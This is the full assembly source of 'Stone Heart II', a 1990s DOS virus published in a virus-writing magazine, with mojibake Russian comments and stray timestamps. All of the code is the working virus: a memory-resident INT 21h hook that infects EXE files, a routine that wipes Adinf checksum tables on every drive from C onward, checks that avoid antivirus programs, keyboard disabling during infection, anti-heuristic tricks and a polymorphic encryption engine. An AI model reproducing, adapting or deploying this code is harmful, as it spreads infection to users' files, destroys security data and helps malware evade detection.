2022-08-21 09:07:57 +00:00
; <20> <> <20>
; <20> <> <EFBFBD> Virus Magazine <20> Box 176, Kiev 210, Ukraine IV 1997
; <20> <> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <20> <20> <> <EFBFBD> <20> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <20> <20> <20>
; <20> <20> <20> <20> <> <20> <> <20> <20> <20> <> <20> <20> <20> <20> <20> <20> <20> <20> <20> <20> <20> <20> <20>
; <20> <20> <20> <20> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <20> <> <EFBFBD> <20> <> <EFBFBD> <20> <> <20> <> <EFBFBD> <20> <20> <> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <20> <20> <20> <20>
; <20> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; (C) Copyright, 1994-97, by STEALTH group WorldWide, unLtd.
; Stone Heart II
;
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> ६<EFBFBD> <E0A5AC> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> , <20> <> ࠦ<EFBFBD> <E0A0A6> 騩 EXE
; 䠩<> <E4A0A9> > 4096 <20> <> <EFBFBD> <EFBFBD> .
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <20> ணࠬ<E0AEA3> <E0A0AC> (512 <20> <> <EFBFBD> <EFBFBD> <20> <> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> ), <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; 祬<> <20> <> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> Adinf <20> <> <EFBFBD> TbClean.
; <20> <> <EFBFBD> <EFBFBD> ন<EFBFBD> <20> <> <EFBFBD> 쪮 <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> , <20> <> <20> <> 䥪⨢<E4A5AA> <E2A8A2> <EFBFBD> <20> ਥ<EFBFBD> <E0A8A5> <EFBFBD> <20> <> <EFBFBD> ⨢ <20> <> <EFBFBD> <EFBFBD> <EFBFBD> ⨪<EFBFBD>
; (<28> <> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> 㦨<EFBFBD> <E3A6A8> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> DrWeb, F-Prot, AVP <20> <20> .<2E> .). Tbav <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> 㣠<EFBFBD> <E3A3A0> <EFBFBD> <EFBFBD> ,
; <20> <> ।<> <E0A5A4> <20> <20> <> ᨫ쭮 (<28> <> <EFBFBD> <EFBFBD> -<2D> <> <EFBFBD> 䫠<> <E4ABA0> ).
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> ⠡<> <E2A0A1> <EFBFBD> <EFBFBD> Adinf <20> <> <20> <> <EFBFBD> <EFBFBD> ࠧ<> <E0A0A7> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> .
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <20> <> <EFBFBD> <EFBFBD> <EFBFBD> 5 <20> <> . <20> ᯥ譮 ࠡ<> ⠥<EFBFBD> <20> DOS <20> <> <EFBFBD> ᨨ Windows
; 95. <20> <> <EFBFBD> ࠥ<EFBFBD> <E0A0A5> <EFBFBD> <20> <> <20> <> ࠦ<EFBFBD> <E0A0A6> <EFBFBD> <20> <> ⨢<EFBFBD> <E2A8A2> <EFBFBD> <EFBFBD> <EFBFBD> .
;
; (c) Eternal Maverick 1997
.model tiny
.code
;-------------------------------------------------
vl equ offset byte s - start
base equ offset endv - start
CrLen equ ( vl + 200h + 1 ) / 2
;-------------------------------------------------
start:
;-------------------------------------------------
; Very lame Anti-heuristic trick!
; But it works against DrWeb...
;-------------------------------------------------
mov ah , 62h
int 21h
mov ax , es
cmp ax , bx
je NoHer
fuck_it:
cld
call mist
mist:
pop si
add si , 20h
push cs
pop es
mov cx , 500h
rep stosw
jmp short fuck_it
;-------------------------------------------------
NoHer:
push es
no_es:
call next
next:
mov ah , 2Ah
mov bx , 'EM' ; Are you there ?
int 21h
install:
cmp bx , 'ME' ; You ask!
je restore ; Already installed...
pop si
push si
sub si , offset next - start
push es
mov ax , word ptr ds :[ 02h ]
sub ax ,( vl / 16 ) + 1
mov es , ax
call remove
pop ds
mov si , 0Ah
mov di , offset fail - start + 1
movsw
movsw
mov word ptr ds :[ si - 4 ], offset INT22h - start
mov word ptr ds :[ si - 2 ], es
mov ds , cx
mov si , 084h
mov di , offset old21h - start + 1
movsw
movsw
;------------------------------------
; Adinf tables to kill!
;------------------------------------
; P.S. Adinf - a nasty bitch,
; creating checksum tables
; on every hard disk drive.
;------------------------------------
call DelTab
mask1 db 'C:\*.*' , 0
restore:
pop si
pop dx
push dx
add dx , 10h
push dx
add dx , 20h
sub dx , word ptr cs :[ si + offset byte s - next + 08h ]
mov ax , word ptr cs :[ si + offset CodeKey - next ]
mov ds , dx
mov cx , 100h
xor di , di
Decrypt:
xor word ptr ds :[ di ], ax
inc di
inc di
loop Decrypt
pop dx
push cs
pop ds
mov cx , word ptr ds :[ si + offset byte s - next + 06h ]
or cx , cx
jz No_Relocation
mov bx , word ptr ds :[ si + offset byte s - next + 18h ]
Next_Relo:
les di , dword ptr ds :[ si + bx + offset byte s - next ]
mov ax , es
add ax , dx
mov es , ax
add word ptr es :[ di ], dx
add bx , 4
loop Next_Relo
No_Relocation:
pop es
mov cx , word ptr ds :[ si + offset byte s - next ]
mov cx , dx
cli
add cx , word ptr ds :[ si + offset byte s - next + 0Eh ]
mov ss , cx
mov sp , word ptr ds :[ si + offset byte s - next + 10h ]
sti
add dx , word ptr ds :[ si + offset byte s - next + 16h ]
push dx
push word ptr ds :[ si + offset byte s - next + 14h ]
push es
pop ds
xor ax , ax
xor bx , bx
xor si , si
xor di , di
retf
DelTab:
pop di
push cs
pop ds
mov ax , 3524h
int 21h
push es bx
lea dx ,[ di + offset int24h - mask1 ]
mov ah , 25h
int 21h
mov ah , 2fh
int 21h
push es bx
lea dx ,[ di + offset NewBytes - mask1 ]
mov ah , 1Ah
int 21h
mov byte ptr ds :[ di ], 'C'
mov dx , di
NextDisk:
push ds dx
mov cx , 07
mov ah , 4eh
int 21h
jc NotFound
NextKill:
mov ah , 2fh
int 21h
pop di
mov ax , word ptr ds :[ di ]
push di
push es
pop ds
mov dl , byte ptr ds :[ bx + 1Eh + 06 ]
cmp dl , al
jne NextFile
mov word ptr ds :[ bx + 1bh ], ax
mov byte ptr ds :[ bx + 1dh ], '\'
lea dx ,[ bx + 1bh ]
xor cx , cx
mov ax , 4301h
int 21h
mov cl , 07
mov ah , 3ch
int 21h
NextFile:
pop dx ds
push ds dx
mov ah , 4fh
int 21h
jnc NextKill
NotFound:
pop dx ds
mov di , dx
inc byte ptr ds :[ di ]
cmp al , 12h
je NextDisk
pop dx ds
mov ah , 1ah
int 21h
pop dx ds
mov ax , 2524h
int 21h
jmp restore
remove:
push cs
pop ds
mov cx , vl / 2
xor di , di
rep movsw
ret
set21h:
cli
mov si , 084h
mov word ptr ds :[ si ], offset int21h - start
mov word ptr ds :[ si + 2 ], es
sti
ret
int22h:
mov ah , 48h
mov bx ,( vl + 400h + offset endcode - start ) / 16 + 1
int 21h
jc fail
mov es , ax
dec ax
mov ds , ax
xor si , si
mov word ptr ds :[ si + 1 ], 70h
call remove
mov ds , cx
call set21h
fail:
db 0EAh , 0 , 0 , 0 , 0
int21h:
cmp ah , 4bh
je ch eck
cmp ah , 3dh
je ch eck
cmp ah , 43h
je ch eck
;----------------------
; Here I am, Boss!
;----------------------
cmp ah , 2Ah
jne old21h
cmp bx , 'EM'
jne old21h
xchg bh , bl
iret
;--------------------------------
old21h: db 0EAh , 0 , 0 , 0 , 0
int24h:
mov al , 3
iret
check:
;---------------------------------------
; Check if it is a proper file
; for infection
;---------------------------------------
push bp si di es bx cx ax dx ds
mov di , dx
mov si , di
push ds
pop es
mov ax , 1211h
int 2Fh ; Converts ASCIIZ line into UpCase letters
cld
sub di , 4
mov ax , 'XE'
scasw
jne abort
scasb
jne abort ; Not EXE...
cmp byte ptr es :[ di - 5 ], 'F' ; Adin'F' - ?
je abort ; Don't touch it.
sub di , 12 ; 12 = Filename + '.' + Extention
;---------------------
; Check if file name
; contains digits
;---------------------
mov si , di
push es
pop ds
mov cx , 8
isDigit:
lodsb
cmp al , '0'
jb noDigit
cmp al , '9'
jbe abort
noDigit:
loop isDigit
;---------------------
; Check for antivirus
; names
;---------------------
push cs
pop ds
mov cl , 6
ChkThis:
push cx
mov si , offset antiv - start
mov cl , 6
DoComp:
cmpsw
jne NextStr
cmpsb
je ExitComp
dec si
dec di
NextStr:
inc si
dec di
dec di
loop DoComp
inc di
pop cx
loop Ch kThis
;---------------------
ExitComp:
or cx , cx
jz Okey ; Good file
pop cx
abort:
jmp _esc
Okey:
;---------------------------------------
; Save & set INT 24h
;---------------------------------------
mov ax , 3524h
call INT_21h
mov word ptr ds :[ base ], bx
mov word ptr ds :[ base + 2 ], es
mov ax , 2524h
mov dx , offset int24h - start
call INT_21h
;---------------------------------------
; Turn keyboard off
;---------------------------------------
in al , 21h
or al , 00000010b
out 21h , AL
;---------------------------------------
pop ds dx
push dx ds
mov ax , 4300h
call INT_21h
push cx
test cl , 00000100b ; System file - ?
jnz protect ; Don't touch it!!!
;----------------------------------------
; Checking for protected floppy
; using 3F5h port
;----------------------------------------
push dx
mov cx , 400h
mov dx , 3F5h
mov al , 4
out dx , al
wait_1:
loop wait_1
mov cx , 400h
out dx , al
wait_2:
loop wait_2
in al , dx
test al , 40h ; Protected disk - ?
pop dx
jnz protect
;----------------------------------
pop cx
push cx
and cl , 0FEh ; Set READ-ONLY off
mov ax , 4301h
call INT_21h
jnc FileOk
;-------------------------------
; Not able to change attribute
;-------------------------------
protect:
pop cx
jmp es c_1
FileOk:
push dx ds
mov ax , 3D02h
call INT_21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov word ptr cs :[ base + 06h ], ax
mov ax , 5700h
call FileX ; DOS Services ah=function 57h
; get/set file date & time
push dx cx
cmp cl , 0Fh ; Is it already infected?
je es c2
push cs
pop ds
mov dx , offset Byte s - start
mov cx , 400h
call ReadX ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
call SeekE
cmp ax , 1000h ; File too small to be infected - ?
jb es c2
mov si , offset Byte s - start
cmp word ptr ds :[ si ], 'MZ'
je ExeOk
cmp word ptr ds :[ si ], 'ZM'
jne es c2
ExeOk:
;---------------------------------------
; Is header longer than 512 bytes ?
;---------------------------------------
cmp word ptr ds :[ si + 8 ], 20h
ja es c2
;---------------------------------------
; Is this EXE segmented ?
;---------------------------------------
push dx ax
mov di , 200h
div di
dec ax
cmp ax , word ptr ds :[ si + 04h ]
pop ax dx
jbe Not_Segmented
esc2:
jmp es c_2
;----------------------------------------
Not_Segmented:
mov di , offset NewBytes - start
push ds
pop es
mov cx , 0Ch
rep movsw
mov cx , 10h
div cx
sub ax , word ptr ds :[ si + 1024 - 18h + 08h ]
mov word ptr ds :[ si + 1024 - 18h + 16h ], ax ; ReloCS
mov word ptr ds :[ si + 1024 - 18h + 14h ], dx ; ExeIP
mov word ptr ds :[ offset SaveOff - Start ], dx
;----------------------------------------
; Reseting STACK
;----------------------------------------
add ax ,( vl + 200h ) / 16 + 1
mov word ptr ds :[ si + 1024 - 18h + 0Eh ], ax ; ReloSS
add dx , 400h
and dl , not 1 ; To avoid an odd stack
mov word ptr ds :[ si + 1024 - 18h + 10h ], dx ; ReloSP
;----------------------------------------
again:
in ax , 40h
or ax , ax
jz again
mov word ptr ds :[ offset CodeKey - start ], ax
mov di , offset Byte s - start + 200h
push di
mov cx , 100h
Encrypt:
xor word ptr ds :[ di ], ax
inc di
inc di
loop Encrypt
push si
xor si , si
mov di , cs
add di ,( offset buffer - start ) / 16 + 1
mov es , di
call emme11
pop si
push di
xor dx , dx
mov ax , word ptr ds :[ si + 1024 - 18h + 02h ]
add ax , di
mov di , 200h
div di
add word ptr ds :[ si + 1024 - 18h + 04h ], ax ; FileSize in 512-byte blocks
mov word ptr ds :[ si + 1024 - 18h + 02h ], dx ; Rest of bytes
mov word ptr ds :[ si + 1024 - 18h + 06h ], 0 ; Set number of relocation
; table elements to 0
pop cx
push es
pop ds
xor dx , dx
call WriteX ; Write virus body
push cs
pop ds
call SeekH
mov dx , offset NewBytes - start
call WriteH ; Write first 18h bytes (header)
xor al , al
mov dx , 200h
call SeekY
mov cx , 200h
pop dx
call WriteX
Marker:
pop cx
mov cl , 0Fh ; Set time to mark infection
push cx
esc_2:
pop cx dx
mov ax , 5701h
call FileX ; DOS Services ah=function 57h
; get/set file date & time
mov ah , 3Eh
call FileX ; DOS Services ah=function 3Eh
; close file, bx=file handle
pop ds dx cx
mov ax , 4301h
call INT_21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
esc_1:
;-----------------------------
; Restore int 24h
;-----------------------------
lds dx , dword ptr cs :[ base ]
mov ax , 2524h
call INT_21h
;-----------------------------
; Enable IRQ-1
; User can play with keyboard
; again.
;-----------------------------
in al , 21h
and al , not 2
out 21h , al
;-----------------------------
_ESC:
pop ds dx ax cx bx es di si bp
jmp old21h ; No other actions.
db 'StoneHeart II' ; Virus name
ReadX:
mov ah , 3Fh
jmp short FileX
WriteH:
mov cx , 18h
WriteX:
mov ah , 40h
jmp short FileX
SeekH:
xor al , al
jmp short SeekX
SeekE:
mov al , 02
SeekX:
xor dx , dx
SeekY:
xor cx , cx
SeekZ:
mov ah , 42h
FileX:
mov bx , word ptr cs :[ base + 06h ] ; File Handle is stored there...
INT_21h:
pushf
call dword ptr cs :[ offset old21h - start + 1 ]
ret
CodeKey:
dw 0 ; This word is used to crypt
; a part of file
;-----------------------------------------------------------------
; These shity programs are too stinky to be even infected
;-----------------------------------------------------------------
ANTIV db 'AID' , 'AVP' , 'PRO' , 'SCA' , 'EXT' , 'WEB'
;-----------------------------------------------------------------
; Polymorphic Engine of Stone Heart II
;-----------------------------------------------------------------
Emme11:
call modulof
modulof:
pop bp
sub bp , 3
;--------------------------------------------------------------------------
; PARAMETERS:
; ES - points to buffer of proper size.
; DS - points to segment of code to be encrypted.
; SI - offset of code to be crypted.
; CrLen - number of words (NOT BYTES!!!) to be crypted.
; SaveOff - delta offset in file (Length + 100h for appending
; COM infector, for example)
;
; When finished:
; <20> S:0 - crypted code.
; DI - its size in bytes.
;--------------------------------------------------------------------------
; A structure of encryptor:
; -------------------------
;
; mov reg1,offcode ; offcode - offset of crypted code
; mov reg2,-CrLen
; mov reg3,code_1
;Decode:
; oper1 word ptr ds:[reg1],reg3
; inc reg1
; inc reg1
; oper2 reg3,code_2
; inc reg2
; jnz Decode
;
; --------------------------------
;
; reg1 - SI,DI,BX or BP
; reg2,reg3 - AX,BX,CX,DX,BP,SI or DI
; oper1 - XOR,ADD or SUB
; oper2 - ADD or SUB
;
; code_1,code_2 - random numbers
;
; All unused in decryptor registers are used in garbage instructions.
;--------------------------------------------------------------------------
PolyStart:
in al , 40h
or al , al
jz PolyStart
push si
xor di , di
call makeini
inc byte ptr [ bp + offset Reg - Emme11 ]
lea si ,[ bp + offset anti - Emme11 ]
mov cx , 05h
ANTI_HER:
cmp cl , 2
jne noGlue
mov al , 75h
stosb
push di
inc di
noGlue:
call make
movsw
loop anti_her
pop bx
mov ax , di
sub ax , bx
dec ax
dec ax
dec ax
mov byte ptr es :[ bx ], al
;---------------------------------------------
; Creating a decryptor
;---------------------------------------------
call makeini
;---------------------------------------------
; First instruction
;---------------------------------------------
instr1:
call ZeroTwo
mov al , byte ptr ds :[ bx + offset Pack_1 - Emme11 ]
stosb
push di ; Needed for decryptor
stosw ; To reserve a place for offset
mov al , byte ptr ds :[ bx + 3 + offset Pack_1 - Emme11 ]
mov byte ptr ds :[ si + 1 ], al
mov al , byte ptr ds :[ bx + 6 + offset Pack_1 - Emme11 ]
mov ah , al
mov word ptr ds :[ si + 2 ], ax
sub al , 40h
mov bl , al
call _fill ; Make a register busy
call make
;-----------------------------------------------
; Second instruction
;-----------------------------------------------
instr2:
call f_reg
in ax , 40h
and ax , 0Fh
add ax , CrLen
add bl , 48h
mov byte ptr ds :[ si + 7 ], bl
stosw
call make
;------------------------------------------------
; Third instruction
;------------------------------------------------
instr3:
call f_reg
mov byte ptr ds :[ si + 5 ], bl
mov al , 8
mul bl
add byte ptr ds :[ si + 1 ], al
in ax , 40h
add ax , di
stosw
push di
mov word ptr ds :[ bp + offset encryptor - Emme11 - 3 ], ax
call make
;--------------------------------------------------
; To choose operations
;--------------------------------------------------
call ZeroTwo
mov al , byte ptr ds :[ offset mirror1 - Emme11 + bx ]
mov byte ptr ds :[ si ], al
sub bx , bp
neg bx
add bx , bp
mov al , byte ptr ds :[ offset mirror1 - Emme11 + bx + 2 ]
mov byte ptr ds :[ bp + offset encryptor - Emme11 + 2 ], al
call rnd
and bl , 1
add bx , bp
mov al , byte ptr ds :[ offset mirror2 - Emme11 + bx ]
add byte ptr ds :[ si + 5 ], al
add al , 3
mov byte ptr ds :[ bp + offset encryptor - Emme11 + 6 ], al
;-----------------------------------------------------
; To copy rest of decryptor
;-----------------------------------------------------
movsw
call make
movsb
call make
movsb
call make
movsw
in al , 40h
mov byte ptr ds :[ bp + offset encryptor - Emme11 + 7 ], al
stosb
inc si
call make
movsw
mov ax , 0FFh
sub ax , di
pop bx
add ax , bx ; BYTE for JNZ instruction
stosb
call make
pop si
mov ax , word ptr ds :[ SaveOff ]
add ax , di
mov word ptr es :[ si ], ax ; Offset of crypted code
mov cx , CrLen
mov bx , 0FFFFh
pop si
encryptor:
movsw
xor word ptr es :[ di - 2 ], bx
sub bx , 0
loop encryptor
ret
makeini:
mov byte ptr ds :[ bp + offset Reg - Emme11 ], 10h
make:
;-----------------------
; Makes from 1 up to 8
; bytes of garbage code
;-----------------------
in ax , 40h
and ax , 00000111b
inc ax ; Number of bytes
mov dx , ax
poly:
push dx
;------------------------------------
; Generate 1-byte command
;------------------------------------
form_1:
call rnd
add bx , bp
mov al , byte ptr ds :[ bx + offset data_1 - Emme11 ]
good_1:
stosb
dec dx
form_2:
;-------------------------------------
; Generate 2-bytes command
;-------------------------------------
cmp dx , 2
jb PolyStop
call rnd
call _free
jnz form_3
mov al , 8
mul bl
add al , 0C0h
push ax
call rnd
pop ax
add al , bl
xchg ah , al
add bx , bp
mov al , byte ptr ds :[ bx + offset data_2 - Emme11 ]
stosw
dec dx
dec dx
form_3:
;-------------------------------------
; Generate 3-bytes command
;-------------------------------------
cmp dx , 3
jb PolyStop
call _form
jnz form_4
mov al , 83h
stosw
in al , 40h
stosb
sub dx , 3
form_4:
;-------------------------------------
; Generate 4-bytes command
;-------------------------------------
cmp dx , 4
jb PolyStop
call _form
jnz PolyStop
mov al , 81h
stosw
in ax , 40h
xor ax , di
stosw
sub dx , 4
PolyStop:
or dx , dx
jnz form_1
pop dx
ret
ZeroTwo:
call rnd
mov ax , bx
mov bl , 3
div bl
mov bl , ah
add bx , bp
ret
;-----------------------------------------------------------------
Reg db 10h ; This byte is to mark registers
; involved in decryptor.
; 10h means don't use SP as a garbage
; register ;)
;-----------------------------------------------------------------
; Data for polymorphic engine
;-----------------------------------------------------------------
data_1 db 0f5h , 0f8h , 0f9h , 0fbh , 0fch , 0fdh , 09eh , 090h
data_2 db 03h , 0bh , 013h , 01bh , 023h , 02bh , 033h , 085h
pack_1:
mov_reg1 db 0beh , 0bfh , 0bbh
xor_reg1 db 04h , 05h , 07h
inc_reg1 db 046h , 047h , 043h
operations:
mirror1 db 01h , 031h , 029h
mirror2 db 0c0h , 0e8h
;---------------------------------------------------------------------
db 'EMME Small 1.1' ; Small Eternal Maverick Mutation Engine
;---------------------------------------------------------------------
_form proc near
call rnd
and al , 03Fh
add al , 0C0h
xchg al , ah
_free:
push bx
push cx
mov cl , bl
mov bl , 1
shl bl , cl
test byte ptr ds :[ bp + offset Reg - Emme11 ], bl
jmp short popcxbx
f_reg:
call rnd
call _free
jnz f_reg
mov al , 0B8h
add al , bl
stosb
_fill:
push bx
push cx
mov cl , bl
mov bl , 1
shl bl , cl
add byte ptr ds :[ bp + offset Reg - Emme11 ], bl
popcxbx:
pop cx
pop bx
ret
_form endp
rnd:
;---------------------------
; A bad way for getting a
; random number
;---------------------------
push dx
in ax ,[ 40h ]
add ax , word ptr ds :[ bp + offset Seed - Emme11 ]
mov dx , 25173
mul dx
add ax , 13849
pop dx
mov word ptr ds :[ bp + offset Seed - Emme11 ], ax
xor ax , word ptr ds :[ bp + offset ForXor - Emme11 ]
mov bx , ax
and bx , 7
ret
Seed dw 37849
ForXor dw 559
;--------------------------------
; Built-in anti-heuristic,
; bad against DrWeb, but good
; againt some other antiviruses
;--------------------------------
anti:
xor ax , ax
in ax , 40h
or ax , ax
int 20h
push cs
pop ds
;--------------------------------
; Cryptor Pattern
;--------------------------------
Pattern:
xor word ptr ds :[ di ], bx
inc di
inc di
sub bx , 0
inc cx
jnz Pattern
;----------------------------------------
; End of Polymorphic Engine
;----------------------------------------
bytes:
;----------------------------------------
; Victim file header
;----------------------------------------
db 10h dup ( 0 )
dw offset vstack
dw 0
dw offset endv
db 2 dup ( 0 )
;-----------------------------------------------------------------
db 400h - 18h dup ( 0 ) ; Rest of files' first 1024 bytes
;-----------------------------------------------------------------
NewBytes:
db 18h dup ( 0 ) ; New header for infected file
endcode:
db 10h dup ( 0 )
buffer:
db 0900h dup ( 0 ) ; Buffer for crypting
SaveOff dw 0 ; Used in polymorphic engine
endv:
mov ah , 4ch
int 21h
.stack
dw 16 dup ( 0 )
vstack:
2021-01-12 23:58:25 +00:00
end start
